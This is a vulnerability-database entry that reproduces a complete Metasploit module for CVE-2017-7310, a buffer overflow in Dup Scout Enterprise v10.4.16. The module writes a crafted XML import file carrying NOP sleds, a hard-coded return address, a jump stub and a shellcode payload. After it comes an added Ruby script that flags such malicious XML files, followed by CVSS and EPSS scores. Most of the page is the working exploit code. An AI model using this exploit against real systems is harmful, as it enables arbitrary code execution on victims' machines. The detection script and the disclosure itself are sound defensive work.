Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow

Reported by Daniel Teixeira, 24 Jan 2018 20:47:46
Type: metasploit
Source: www.rapid7.com
45 views

The Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow exploit allows remote attackers to execute arbitrary code via a specially crafted XML file.

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow',
      'Description'     => %q(
        This module exploits a buffer overflow in Dup Scout Enterprise v10.4.16
        by using the import command option to import a specially crafted xml file.
      ),
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Daniel Teixeira'
        ],
      'References'      =>
        [
          [ 'CVE', '2017-7310' ]
        ],
      'DefaultOptions'  =>
        {
          'EXITFUNC' => 'seh',
          'DisablePayloadHandler' => true
        },
      'Platform'        => 'win',
      'Payload'         =>
        {
          'BadChars' => "\x27",
          'StackAdjustment' => -3500
        },
      'Targets'         =>
        [
          ['Windows Universal', { 'Ret' => 0x651BB77A  } ] # JMP ESP [QtGui4.dll]
        ],
      'Privileged'      => false,
      'DisclosureDate'  => '2017-03-29',
      'DefaultTarget'   => 0))

    register_options(
      [
        OptString.new('FILENAME', [true, 'The file name.', 'msf.xml'])
      ])
  end

  def exploit
    esp = "\x8d\x44\x24\x14" # LEA EAX, [ESP+14h]
    jmp = "\xff\xe0"         # JMP EAX

    buf = "<?xml ?><a name='"
    buf << make_nops(1560)
    buf << [target.ret].pack('V')
    buf << make_nops(16)
    buf << esp
    buf << jmp
    buf << make_nops(14)
    buf << payload.encoded

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(buf)
  end
end
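As an added defender-side check (not part of the module above or of the Dup Scout product), the following Ruby script flags XML import files that carry the traits of the crafted file this module writes: an oversized attribute value, an unterminated quote, and non-printable bytes inside the value. The length threshold, the function names and the two sample files are constructed for this illustration.

```ruby
# Added pre-import check, not part of the Metasploit module on this page.
# Flags XML whose attribute values are oversized, unterminated, or carry
# non-printable bytes. MAX_ATTR_LEN is a constructed limit for illustration.
MAX_ATTR_LEN = 512

# Byte-level scan of attribute values (name='...' or name="...").
# A real XML parser is deliberately not used: the crafted file is not
# well-formed, so a parser would only raise and tell us nothing about it.
def scan_xml_attributes(xml, max_len: MAX_ATTR_LEN)
  bytes = xml.b # binary copy so invalid UTF-8 does not break the regex
  findings = []
  bytes.scan(/([A-Za-z_:][\w:.-]*)\s*=\s*(['"])/) do |attr, quote|
    start = $~.end(0)                    # first byte of the value
    close = bytes.index(quote, start)    # nil when the quote is never closed
    value = bytes[start...(close || bytes.bytesize)]
    nonprintable = value.each_byte.count do |b|
      !(b == 9 || b == 10 || b == 13 || (32..126).cover?(b))
    end
    findings << {
      attr: attr,
      length: value.bytesize,
      nonprintable: nonprintable,
      unterminated: close.nil?,
      suspicious: value.bytesize > max_len || nonprintable > 0 || close.nil?
    }
  end
  findings
end

# True when any attribute value in the file looks like an overflow payload.
def suspicious_import?(xml, max_len: MAX_ATTR_LEN)
  scan_xml_attributes(xml, max_len: max_len).any? { |f| f[:suspicious] }
end

# Constructed samples: a benign import file, and one shaped like the crafted
# file (a huge, unterminated attribute value ending in non-printable bytes).
BENIGN_XML = "<?xml version='1.0'?><dupscout><cmd name='weekly' mode=\"dup\"/></dupscout>"
CRAFTED_XML = "<?xml ?><a name='" + ("A" * 2000) + "\xde\xad".b

if __FILE__ == $PROGRAM_NAME
  [BENIGN_XML, CRAFTED_XML].each do |sample|
    verdict = suspicious_import?(sample) ? 'SUSPICIOUS' : 'ok'
    puts "#{verdict}: #{scan_xml_attributes(sample).inspect}"
  end
end
```

Run it against a file with `suspicious_import?(File.binread(path))` before handing the file to an import routine.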


Scores (current as of 02 Oct 2020 20:00):
Vulners AI Score: 0.6 (Low risk)
CVSS 2: 6.8
CVSS 3: 7.8
EPSS: 0.66811